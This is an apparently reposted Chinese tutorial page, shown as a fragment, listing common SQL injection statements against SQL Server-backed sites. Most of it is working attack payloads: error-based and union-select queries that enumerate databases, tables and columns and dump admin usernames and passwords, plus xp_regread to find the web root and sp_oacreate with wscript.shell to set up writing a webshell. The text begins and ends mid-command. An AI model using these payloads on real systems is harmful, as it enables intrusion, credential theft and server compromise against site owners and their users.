常用SQL注射语句解析(2)_MySQL
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了常用SQL注射语句解析(2)_MySQL,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2793字,纯文字阅读大概需要4分钟。
内容图文
![常用SQL注射语句解析(2)_MySQL](/upload/InfoBanner/zyjiaocheng/572/164c666f97ec4fdea35dd527d0e10346.jpg)
w "默认Web站点"
-v "e","e:/"'--
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a
w3svc/1/ROOT/e +browse'
爆库 特殊技巧::%5c='/' 或者把/和/ 修改%5提交
如何得到SQLSERVER某个数据库中所有表的表名?
--------------------------------------------------------------------------------
用户表:
select name from sysobjects where xtype = 'U';
系统表:
select name from sysobjects where xtype = 'S';
所有表:
select name from sysobjects where xtype = 'S' or xtype = 'U';
--------------------------------------------------------------------------------
and 0<>(select top 1 paths from newtable)--
得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and
dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表
假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name
not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and
name='admin'
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and
name not in
('id',...)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and
dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name
not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and
name='admin' and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union,access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare
@test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/',
@value_name='/', values=@test OUTPUT insert into p
bitsCN.com
内容总结
以上是互联网集市为您收集整理的常用SQL注射语句解析(2)_MySQL全部内容,希望文章能够帮你解决常用SQL注射语句解析(2)_MySQL所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。